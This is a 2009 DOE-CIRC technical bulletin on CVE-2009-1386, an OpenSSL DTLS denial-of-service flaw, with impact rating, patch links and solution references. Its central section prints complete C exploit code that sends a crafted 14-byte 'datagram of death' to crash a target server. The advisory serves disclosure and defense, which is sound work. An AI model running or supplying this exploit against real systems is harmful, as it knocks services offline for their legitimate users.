TECHNICAL BULLETIN

T-155: OpenSSL 'ChangeCipherSpec' DTLS Packet Denial of Service Vulnerability

[CVE-2009-1386]

June 5, 2009 15:00 GMT


PROBLEM:	OpenSSL is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference condition.
PLATFORM:	Versions prior to OpenSSL 0.9.8i
ABSTRACT:	OpenSSL is prone to a denial-of-service vulnerability caused by a NULL-pointer dereference condition. ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello.

LINKS:
DOE-CIRC BULLETIN:	http://www.doecirc.energy.gov/bulletins/t-155.shtml
OTHER LINKS:	Security Focus http://www.securityfocus.com/bid/35174/info CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 NIST http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1386 OpenSSL http://cvs.openssl.org/chngview?cn=17369

IMPACT ASSESSMENT:	This risk is medium. An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

[***** Start CVE-2009-1386 *****]
The following exploit code is avaliable:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>

int
main(int argc, char **argv)
{
	int sock, ret;
	char *ptr, *err;
	struct hostent *h;
	struct sockaddr_in target;
	char buf[64];

	if (argc < 3) {
		err = "Pass the host and port of the target DTLS server";
		printf("[-] Error: %s\n", err);
		exit(1);
	}

	h = gethostbyname(argv[1]);
	if (!h) {
		err = "Unknown host specified";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	target.sin_family = h->h_addrtype;
	memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
	target.sin_port = htons(atoi(argv[2]));

	sock = socket(AF_INET, SOCK_DGRAM, 0);
	if (sock == -1) {
		err = "Failed creating UDP socket";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
	if (ret == -1) {
		err = "Failed to connect socket";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14);

	printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]);

	send(sock, buf, 14, 0);

	close(sock);

	return 0;
}

Solution:
An update is available. Refer to link below for additional information.

http://www.securityfocus.com/bid/35174/solution

Patch information:
http://cvs.openssl.org/chngview?cn=17369
[***** End CVE-2009-1386 *****]

DOE-CIRC wishes to acknowledge the contributions of Alex Lam for the information contained in this bulletin.

DOECIRC services are available to DOE, DOE Contractors, and the NIH. DOE-CIRC can be contacted at:

    Voice:          866-941-2472
    E-mail:          doecirc@doecirc.energy.gov
    World Wide Web:  http://www.doecirc.energy.gov

UCRL-MI-119788